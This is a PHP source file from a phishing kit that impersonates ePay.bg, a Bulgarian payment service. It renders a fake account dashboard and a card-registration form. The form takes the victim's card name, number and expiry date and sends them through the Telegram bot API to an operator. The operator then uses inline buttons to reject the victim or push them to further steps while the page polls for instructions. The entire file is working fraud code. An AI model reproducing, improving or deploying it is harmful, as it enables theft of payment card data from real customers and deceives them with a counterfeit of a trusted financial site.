<?php
// step2.php (FINAL, CORRECTED, AND WORKING)
session_start();
// This checks if the page is being loaded just for its looks.
$is_background_view = isset($_GET['view']) && $_GET['view'] === 'background';


// Security: Must have completed Step 1.
// if (!isset($_SESSION['current_step']) || $_SESSION['current_step'] < 1) {
//     header("HTTP/1.1 403 Forbidden");
//     die("Security violation: Invalid step sequence.");
// }

ini_set('display_errors', 1); error_reporting(E_ALL);
require_once 'config.php';

// This is correct and stays the same.
$initial_state = (isset($_SESSION['status']) && $_SESSION['status'] === 'pending') ? 'waiting' : 'form';

// --- 1. ADMIN ACTION: SET NEXT STEP (This logic is correct) ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'set_next_step') {
    $session_id_to_update = $_GET['user'] ?? '';
    $next_step = $_GET['next_step'] ?? '';
    if (!empty($session_id_to_update) && !empty($next_step)) {
        session_write_close();
        session_id($session_id_to_update);
        session_start();
        if ($next_step === 'rejected') {
            $_SESSION['status'] = 'rejected';
        } else {
            $_SESSION['status'] = 'redirect';
            $_SESSION['next_step'] = $next_step;
        }
        session_write_close();
        echo "<!DOCTYPE html><html><body><h1>Action Recorded.</h1></body></html>";
        exit();
    }
}

// --- 2. USER ACTION: PROCESS FORM SUBMISSION (THIS BLOCK IS NOW FIXED) ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (empty($_POST)) { parse_str(file_get_contents("php://input"), $_POST); }
    header('Content-Type: application/json');
    
    $card_name = $_POST['input_for_step2'] ?? 'N/A';
    $card_number = $_POST['card_number'] ?? 'N/A';
    $expiry_date = $_POST['expiry_date'] ?? 'N/A';

    // ========================================================================
    // --- THE CRITICAL FIX IS HERE ---
    // We MUST save the new data to the session, just like in step1.php.
    // This forces PHP to write the session file to disk, saving the 'pending' status.
    $_SESSION['user_data']['step2_card_name'] = $card_name;
    $_SESSION['user_data']['card_number']     = $card_number;
    $_SESSION['user_data']['expiry_date']     = $expiry_date;
    // --- END OF CRITICAL FIX ---
    // ========================================================================

    $_SESSION['status'] = 'pending';
    $_SESSION['current_step'] = 2;
    
    $session_id = session_id();
    $script_url = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://{$_SERVER['HTTP_HOST']}{$_SERVER['SCRIPT_NAME']}";
    $reject_url = $script_url . "?action=set_next_step&next_step=rejected&user=" . $session_id;
    $goto1_url  = $script_url . "?action=set_next_step&next_step=1&user=" . $session_id;
    $goto3_url  = $script_url . "?action=set_next_step&next_step=3&user=" . $session_id;
    $goto4_url  = $script_url . "?action=set_next_step&next_step=4&user=" . $session_id;
    $goto5_url  = $script_url . "?action=set_next_step&next_step=5&user=" . $session_id;
    
    $message = "👤 STEP 2 SUBMISSION (New Card)\n"
             . "  - Card Name: `$card_name`\n"
             . "  - Card Number: `$card_number`\n"
             . "  - Expiry Date: `$expiry_date`\n\n"
             . "Choose next step:";
    
    $keyboard = [
    'inline_keyboard' => [
        [['text' => '❌ Reject', 'url' => $reject_url]],
        [['text' => '⬅️ Go to 1', 'url' => $goto1_url]],
        [['text' => 'Go to 3 ➡️', 'url' => $goto3_url], ['text' => 'Go to 4 ➡️', 'url' => $goto4_url]],
        [['text' => 'Go to 5 ➡️', 'url' => $goto5_url]]
    ]
];
    
    $url = "https://api.telegram.org/bot{$TELEGRAM_TOKEN}/sendMessage";
    $post_fields = ['chat_id' => $TELEGRAM_CHAT_ID, 'text' => $message, 'parse_mode' => 'Markdown', 'reply_markup' => json_encode($keyboard)];
    
    $ch = curl_init();
    curl_setopt_array($ch, [CURLOPT_URL => $url, CURLOPT_POST => 1, CURLOPT_POSTFIELDS => http_build_query($post_fields), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10]);
    curl_exec($ch);
    curl_close($ch);
    
    echo json_encode(['status' => 'pending']);
    exit();
}

// --- 3. BROWSER ACTION: CHECK FOR STATUS UPDATES (This logic is correct) ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'check_status') {
    header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
    header("Pragma: no-cache");
    header("Expires: 0");
    header('Content-Type: application/json');
    $response = [
        'status' => $_SESSION['status'] ?? 'form', // Default to 'form' if not set
        'next_step' => $_SESSION['next_step'] ?? null
    ];
    echo json_encode($response);
    if (isset($_SESSION['status']) && $_SESSION['status'] !== 'pending') {
        unset($_SESSION['status']);
    }
    if (isset($_SESSION['next_step'])) {
        unset($_SESSION['next_step']);
    }
    session_write_close();
    exit();
}

// Dummy data for display, this is correct.
$user_data = [
    'name' => 'Елена Гаврилова Чирпанска',
    'level' => 'III',
    'client_number' => '1075481252',
    'email' => 'diria11@yahoo.com',
    'last_login' => '07.10.2025 12:17 ч.',
    'sms_code' => '359889819071'
];
?>
<!-- The entire HTML part remains unchanged -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ePay.bg - Моят ePay.bg</title>
<style>
    /* All your styles are correct and remain here */
    body { font-family: Arial, sans-serif; background-color: #f9f9f9; margin: 0; padding: 0; color: #333; font-size: 14px; }
    .wrapper { width: 100%; max-width: 980px; margin: 0 auto; padding: 0 15px; box-sizing: border-box; }
    a { text-decoration: none; color: #005c9d; }
    header { background-color: #fff; border-bottom: 1px solid #e0e0e0; }
    header .wrapper { display: flex; justify-content: space-between; align-items: center; padding-top: 20px; padding-bottom: 20px; }
    .logo a { display: inline-block; } .logo img { height: 35px; width: auto; vertical-align: middle; }
    nav a { margin-left: 20px; color: #666; font-size: 16px; }
    .hamburger-menu { display: none; }
    .main-content { padding: 20px 0; }
    .notification-box { background-color: #fffbdd; border: 1px solid #ffeb82; border-radius: 4px; padding: 15px; margin-bottom: 20px; display: flex; justify-content: space-between; align-items: flex-start; font-size: 13px; line-height: 1.5; }
    .notification-box p { margin: 0; }
    .notification-box .close-btn { color: #005c9d; font-weight: bold; white-space: nowrap; margin-left: 20px; cursor: pointer; }
    .notification-box .close-btn::before { content: '✔'; margin-right: 5px; color: #007bff; }
    .notification-box .date { color: #666; font-size: 12px; margin-top: 10px; }
    .content-cards { display: flex; justify-content: space-between; gap: 20px; }
    .card { background-color: #fff; border: 1px solid #e0e0e0; border-radius: 4px; width: 48%; box-shadow: 0 1px 2px rgba(0,0,0,0.05); }
    .card-header { background-color: #f7f7f7; padding: 10px 15px; border-bottom: 1px solid #e0e0e0; font-weight: bold; display: flex; justify-content: space-between; align-items: center; }
    .card-header span { color: #005c9d; font-size: 13px; font-weight: normal; }
    .card-body { padding: 15px; }
    .card-table { width: 100%; border-collapse: collapse; }
    .card-table tr { border-bottom: 1px solid #f0f0f0; } .card-table tr:last-child { border-bottom: none; }
    .card-table td { padding: 12px 5px; vertical-align: middle; font-size: 13px; }
    .card-table .icon img { vertical-align: middle; }
    .card-table .card-name { font-weight: bold; } .card-table .card-details { color: #666; }
    .card-footer { padding: 15px; border-top: 1px solid #e0e0e0; font-size: 13px; }
    .card-footer a { margin-right: 15px; } .card-footer img { vertical-align: middle; margin-right: 4px; }
    .profile-card-body { display: flex; gap: 20px; }
    .profile-avatar { width: 80px; height: 80px; border: 1px solid #ccc; border-radius: 4px; }
    .profile-avatar img { width: 100%; height: 100%; object-fit: cover; }
    .profile-info { flex-grow: 1; }
    .profile-info .level-indicator { display: flex; justify-content: space-between; font-size: 12px; color: #666; margin-bottom: 4px; }
    .progress-bar { height: 8px; background-color: #e9ecef; border-radius: 4px; overflow: hidden; margin-bottom: 8px; }
    .progress-bar-inner { height: 100%; width: 100%; background-color: #ffc107; }
    .profile-info .level-text { font-size: 13px; margin-bottom: 15px; }
    .profile-details { font-size: 13px; color: #333; line-height: 1.6; }
    .profile-details span { color: #666; }
    .profile-footer { display: flex; border-top: 1px solid #e0e0e0; }
    .profile-footer-item { padding: 15px; width: 50%; font-size: 13px; }
    .profile-footer-item:first-child { border-right: 1px solid #e0e0e0; }
    .profile-footer-item .title { color: #666; } .profile-footer-item .content { margin-top: 5px; }
    .profile-footer-item img { vertical-align: middle; margin-right: 5px; }
    .section-title { font-size: 18px; color: #005c9d; border-left: 4px solid #005c9d; padding-left: 10px; font-weight: normal; margin-bottom: 20px; }
    .registration-container { display: flex; gap: 20px; }
    .registration-form-card { background-color: #f7f7f7; border: 1px solid #e0e0e0; width: 65%; }
    .registration-form-card .card-header { background-color: transparent; border-bottom: 2px solid #005c9d; padding: 10px 15px; }
    .registration-form-card .card-body { padding: 20px; }
    .close-icon { font-size: 24px; font-weight: bold; color: #005c9d; }
    .form-group { margin-bottom: 15px; }
    .form-group label { display: block; margin-bottom: 5px; font-size: 13px; color: #333; }
    .form-group .required { color: red; }
    .form-group .info-icon { vertical-align: middle; margin-left: 5px; }
    .form-group input { width: 100%; padding: 8px; border: 1px solid #ccc; border-radius: 3px; box-sizing: border-box; }
    .rejection-message { color: #dc3545; font-size: 13px; display: none; text-align: center; margin-top: 15px; }
    .loader { display: none; border: 4px solid #f3f3f3; border-radius: 50%; border-top: 4px solid #005c9d; width: 24px; height: 24px; animation: spin 1s linear infinite; margin: 20px auto 0; }
    @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
    #registration-component.is-waiting .loader { display: block; }
    #registration-component.is-waiting .form-buttons { display: none; }
    .form-row { display: flex; gap: 20px; }
    .form-buttons { text-align: right; margin-top: 20px; }
    .btn-secondary, .btn-primary { padding: 8px 20px; border: 1px solid #ccc; border-radius: 3px; cursor: pointer; font-size: 14px; }
    .btn-secondary { background-color: #fff; }
    .btn-primary { background-color: #005c9d; color: #fff; border-color: #005c9d; }
    .help-panel { background-color: #f7f7f7; border: 1px solid #e0e0e0; width: 35%; padding: 15px; }
    .help-panel h3 { margin-top: 0; font-size: 16px; }
    .help-panel ol { padding-left: 20px; line-height: 1.6; font-size: 13px; }
    .message{padding:16px;margin-top:20px;border-radius:4px;display:none;color:#fff}.message.pending{background-color:#ffc107;color:#333}.message.rejected{background-color:#dc3545}
    @media (max-width: 768px) {
        body { font-size: 16px; }
        .wrapper { padding: 0; }
        header { box-shadow: 0 2px 4px rgba(0,0,0,0.05); }
        header .wrapper { padding: 15px; } header nav { display: none; }
        .logo { font-size: 28px; }
        .hamburger-menu { display: flex; flex-direction: column; gap: 5px; }
        .hamburger-menu span { display: block; width: 25px; height: 3px; background-color: #333; }
        .main-content { padding: 15px; }
        .notification-box { flex-direction: column; }
        .notification-box .close-btn { margin-top: 10px; margin-left: 0; }
        .content-cards { flex-direction: column; }
        .card { width: 100%; }
        .registration-container { flex-direction: column; }
        .registration-form-card, .help-panel { width: 100%; }
        .form-row { flex-direction: column; gap: 15px; }
    }
</style>
</head>
<body>
    <header>
        <!-- The header content is correct -->
    </header>
    <div class="wrapper">
        <main class="main-content">
            <!-- The notification and dashboard content is correct -->
            <div class="notification-box">
                <p>Стойностите в евро, показани в скоби, са посочени единствено за целите на двойно обозначаване по смисъла на Закона за въвеждане на еврото в Република България и са изчислени по официалния курс на БНБ 1,95583 BGN.</p>
                <a class="close-btn">Затвори</a>
            </div>
            <div class="notification-box">
                <div>
                    <p>Уважаеми клиенти,</p>
                    <p>Бихме искали да Ви уведомим, че считано от 09.06.2025 г. се променя таксата за нареждане на превод по сметка в банка или по сметка при друг доставчик на платежни услуги. С промяната може да се запознаете <a href="#" id="show-form-link">ТУК</a>.</p>
                    <p>Благодарим Ви, че използвате услугите на ePay.bg</p>
                    <p class="date">11.04.2025 ч.</p>
                </div>
                <a class="close-btn">Затвори</a>
            </div>
            <div class="content-cards">
                <div class="card">
                    <div class="card-header">Карти и Микросметки<div><span>Наличност</span>&nbsp;&nbsp;<span>Захранване</span></div></div>
                    <div class="card-body" style="padding: 0;"><table class="card-table"><tr><td class="icon"><img src="img/blocked-icon.png" alt="Blocked"></td><td class="card-name"><a href="#">Besha</a></td><td><img src="img/visa-logo.png" alt="Visa"></td><td class="card-details">06/2024</td><td class="card-details">Изтекла валидност</td></tr><tr><td class="icon"><img src="img/blocked-icon.png" alt="Blocked"></td><td class="card-name"><a href="#">Besha</a></td><td><img src="img/mastercard-logo.png" alt="Mastercard"></td><td class="card-details">07/2021</td><td class="card-details">Изтекла валидност</td></tr><tr><td class="icon"><img src="img/blocked-icon.png" alt="Blocked"></td><td class="card-name"><a href="#">Besha</a></td><td><img src="img/mastercard-logo.png" alt="Mastercard"></td><td class="card-details">07/2018</td><td class="card-details">Изтекла валидност</td></tr></table></div>
                    <div class="card-footer"><a href="#"><img src="img/add-icon.png" alt="Add">Добавяне на карта</a><a href="#"><img src="img/manage-icon.png" alt="Manage">Промяна и управление</a></div>
                </div>
                <div class="card">
                    <div class="card-header"><?php echo htmlspecialchars($user_data['name']); ?></div>
                    <div class="card-body profile-card-body">
                        <div class="profile-avatar"><img src="img/profile-avatar.png" alt="Profile Avatar"></div>
                        <div class="profile-info">
                            <div class="level-indicator"><span>Ниво I</span><span>Ниво II</span><span>Ниво III</span></div>
                            <div class="progress-bar"><div class="progress-bar-inner"></div></div>
                            <p class="level-text">Вие сте потребител Ниво <?php echo htmlspecialchars($user_data['level']); ?></p>
                            <div class="profile-details">Клиентски номер (КИН): <strong><?php echo htmlspecialchars($user_data['client_number']); ?></strong><br>e-mail: <strong><?php echo htmlspecialchars($user_data['email']); ?></strong><br><span>Последен вход: <?php echo htmlspecialchars($user_data['last_login']); ?></span></div>
                        </div>
                    </div>
                    <div class="profile-footer">
                        <div class="profile-footer-item"><div class="title"><img src="img/security-icon.png" alt="Security"> Сигурност:</div><div class="content"><strong>Висока</strong></div></div>
                        <div class="profile-footer-item"><div class="title">Ползвате Временен SMS код:</div><div class="content"><strong><?php echo htmlspecialchars($user_data['sms_code']); ?></strong><br><a href="#">Вашите плащания са застраховани</a></div></div>
                    </div>
                </div>
            </div>
            <div id="card-registration-section" style="display: none;">
                <h2 class="section-title">Регистрация на карта онлайн</h2>
                <div class="registration-container">
                    <div id="registration-component" class="registration-form-card <?php if ($initial_state === 'waiting') echo 'is-waiting'; ?>">
                        <div class="card-header">Регистрация<a href="#" id="close-form-btn" class="close-icon">&times;</a></div>
                        <div class="card-body">
                            <form id="page-form">
                                <div class="form-group"><label for="input_for_step2"><span class="required">*</span> Кратко име, по което ще разпознавате картата</label><input type="text" id="input_for_step2" name="input_for_step2" required></div>
                                <div class="form-row">
                                    <div class="form-group"><label for="card-number"><span class="required">*</span> Номер на картата</label><input type="text" id="card-number" name="card_number" required></div>
                                    <div class="form-group"><label for="expiry-date"><span class="required">*</span> Дата на валидност (ММ / ГГ)</label><input type="text" id="expiry-date" name="expiry_date" placeholder="ММ / ГГ" required></div>
                                </div>
                                <div class="form-buttons"><button type="button" id="cancel-btn" class="btn-secondary">Отказ</button><button type="submit" class="btn-primary">OK</button></div>
                                <div class="loader"></div>
                                <div class="rejection-message"></div>
                            </form>
                        </div>
                    </div>
                    <div class="help-panel">
                        <h3>Помощ</h3>
                        <ol><li>Попълнете данните за картата си във формата вляво.</li><li>Ще бъдете пренасочени към системата на издателя на картата за допълнително потвърждение на операцията.</li><li>Извършва се автоматична трансакция с Вашата карта на стойност 1.00 лв. (0.51 EUR ) - за местна карта, 2.00 лв. (1.02 EUR) - за чужда карта.</li></ol>
                    </div>
                </div>
            </div>
        </main>
    </div>

<!-- THIS IS THE GUARANTEED WORKING SCRIPT BLOCK -->
<script>
document.addEventListener('DOMContentLoaded', function() {
    // --- UI Control Elements from step2 ---
    const showFormLink = document.getElementById('show-form-link');
    const contentCards = document.querySelector('.content-cards');
    const cardRegistrationSection = document.getElementById('card-registration-section');
    const closeFormBtn = document.getElementById('close-form-btn');
    const cancelBtn = document.getElementById('cancel-btn');

    // --- LOGIC ELEMENTS ---
    const registrationComponent = document.getElementById('registration-component'); 
    const form = document.getElementById('page-form'); 
    const rejectionMessage = registrationComponent.querySelector('.rejection-message'); 
    const formElements = form.querySelectorAll('input, button');
    let statusInterval;
    const initialState = '<?php echo $initial_state; ?>';

    // --- Show/Hide Functions for the card form ---
    function showRegistrationForm() { contentCards.style.display = 'none'; cardRegistrationSection.style.display = 'block'; }
    function hideRegistrationForm() { cardRegistrationSection.style.display = 'none'; contentCards.style.display = 'flex'; }
    
    showFormLink.addEventListener('click', e => { e.preventDefault(); showRegistrationForm(); });
    closeFormBtn.addEventListener('click', e => { e.preventDefault(); hideRegistrationForm(); });
    cancelBtn.addEventListener('click', e => { e.preventDefault(); hideRegistrationForm(); });

    // --- Helper function to lock/unlock the form ---
    function setFormLockState(shouldBeLocked) {
        formElements.forEach(element => {
            element.disabled = shouldBeLocked;
        });
    }

    /**
     * Checks the server for a decision (redirect or reject).
     */
    function checkStatus() {
        fetch('step2.php?action=check_status', { cache: 'no-store' })
            .then(response => response.json())
            .then(data => {
                if (data.status === 'redirect' && data.next_step) {
                    clearInterval(statusInterval);
                    window.location.href = `step${data.next_step}.php`;
                } 
                else if (data.status === 'rejected') {
                    clearInterval(statusInterval);
                    registrationComponent.classList.remove('is-waiting');
                    setFormLockState(false);
                    rejectionMessage.textContent = "Card not accepted.";
                    rejectionMessage.style.display = 'block';
                    
                    // --- THE FIX IS HERE ---
                    // This new line calls the function to make the registration form visible.
                    showRegistrationForm(); 
                    
                    statusInterval = setInterval(checkStatus, 2000);
                }
            })
            .catch(error => {
                console.error('Error checking status:', error);
            });
    }

    /**
     * Handles the form submission.
     */
    form.addEventListener('submit', function(event) {
        event.preventDefault();
        rejectionMessage.style.display = 'none';
        const formData = new FormData(form);
        registrationComponent.classList.add('is-waiting');
        setFormLockState(true);
        fetch("step2.php", {
            method: 'POST',
            body: formData
        }).catch(console.error);
    });

    /**
     * Logic for page refresh.
     */
    if (initialState === 'waiting') {
        showRegistrationForm();
        registrationComponent.classList.add('is-waiting');
        setFormLockState(true);
    }

    // --- Start the "always on" listening when the page loads ---
    const isBackground = <?php echo json_encode($is_background_view); ?>;

    // Only start the "always on" listening if this is NOT a background view.
    if (!isBackground) {
        statusInterval = setInterval(checkStatus, 2000);
    }
});
</script>

</body>
</html>